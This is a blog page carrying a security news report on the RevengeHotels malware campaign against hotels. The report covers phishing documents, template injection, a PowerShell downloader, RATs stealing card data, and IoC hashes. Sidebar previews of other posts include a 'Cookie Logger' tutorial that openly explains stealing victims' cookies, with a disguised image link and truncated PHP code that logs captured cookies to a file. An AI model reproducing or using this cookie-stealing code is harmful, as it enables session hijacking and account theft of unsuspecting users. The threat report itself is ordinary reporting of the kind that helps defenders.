Skip to main content

Weaponized via Word Documents to Steal Users Credit Card Data , A New Malware Attack Dubbed - RevengeHotels

By
Revenge Hotels

A new malware campaign dubbed “RevengeHotels” targeting hotels, hostels, hospitality, and tourism companies worldwide aimed to steal credit card data of users and Travelers from hotel management systems.
The campaign uses email as the main attack vector to deliver malware via weaponized Word, Excel or PDF documents. In some cases, it exploits patched Remote Code Execution Vulnerability CVE-2017-0199 in Microsoft Office or WordPad.
Researchers from Kaspersky observed tow hacking groups ProCC and RevengeHotels targeting the hospitality sector and they found to be active at least from 2015.

Tactics Used – RevengeHotels

Threat actors use to register typo-squatting domains impersonating the legitimate company names to trick the user believing the email is from the legitimate source.
They use to send emails with details for booking hotels and the spear-phishing email written in the Portuguese language with the malicious file named Reserva Advogados Associados(.)Docx (Attorneys Associates Reservation(.)Docx) attached.
revengehotels
Spear-phishing Email
When the user opens the attached malicious Word document, it drops a remote OLE(Object Linking and Embedding) object via template injection technique to execute the macro that presents inside OLE.
The macro that presents inside contains a PowerShell code that downloads the final payload. The final payload in one such example is a RevengeRAT, the threats include an additional module called ScreenBooking to steal credit card details.
When compared to RevengeHotels campaigns the malware used in ProCC campaigns are highly customized, the malware used is capable of collecting details from clipboard and printer spooler, and capture screenshots.

Data Sold on Underground Forums

The cybercriminals also sell the stolen customer credit card details on dark webs and also access to hotels.
“These criminals also infect front desk machines to capture credentials from the hotel administration software; they can then steal credit card details from it too,” reads the Kaspersky blog post.
Researchers believe the attack has global reach and victims confirmed in the following countries.
revengehotels
Affected Victim’s location
The campaign used customized versions of RevengeRAT, NjRAT, NanoCoreRAT, 888 RAT and a custom malware ProCC to compromise victim machines.
As the holiday season progresses attacks targeting the hospitality sector or on the rise, users can alternatively use virtual payment cards or wallets to stay safe.

IoCs

74440d5d0e6ae9b9a03d06dd61718f66
e675bdf6557350a02f15c14f386fcc47
df632e25c32e8f8ad75ed3c50dd1cd47
a089efd7dd9180f9b726594bb6cf81ae
81701c891a1766c51c74bcfaf285854b
Labels:

Comments

Post a Comment

Popular posts from this blog

10 Best Forum Software For Webmasters

By
10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h
Post a Comment
Read more

Assembly Language Step-by-step: Programming with DOS and Linux-

By
(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM
Post a Comment
Read more

Cookie Logger

By
         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary
Post a Comment
Read more